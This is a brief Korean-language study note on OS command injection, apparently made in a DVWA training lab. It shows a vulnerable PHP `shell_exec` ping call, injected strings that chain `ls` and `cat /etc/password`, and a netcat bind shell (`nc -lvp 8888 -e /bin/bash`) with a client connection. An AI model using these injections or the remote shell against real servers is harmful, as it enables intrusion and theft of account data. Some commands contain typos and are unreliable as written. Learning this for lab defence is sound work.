command Injection
-------------------- >> 명령어
------------------ >> 주입 / 삽입
명령어가 전달될 때 해커가 원하는 명령어를 삽입하는 공격
실제 싱행되는 명령어
$cmd = shell_exec( 'ping -c 4 ' . $target );
--------- : input 창에 입력한 IP 주소다.
ping -c 8.8.8.8 <--- 실행후 결과 값을 반환 한다.
리눅스 업데이트
yum - y update
yum - y upgrade
yum - y update && yum - y upgrade
단, 실행순서 1번이 정상 동작 했을때 실행 순서 2번도 동작한다.
ping -c 8.8.8.8 && ls
추가 명령어 cat /etc/password
ping -c 8.8.8.8 && cat /etc/password
서버의 계정정보를 유출 시켰다.
dvwa.xxx.com <--- 피해서버
nc -lvp 8888 -e /bin/bash : Netcat server 설정 (원격제어의 대상)
공격자 < ----------공격자 컴퓨터 : 명령 전달 서버 : C&C 서버
nc dvwa.kong.com 8888 : Netcat Client 설정
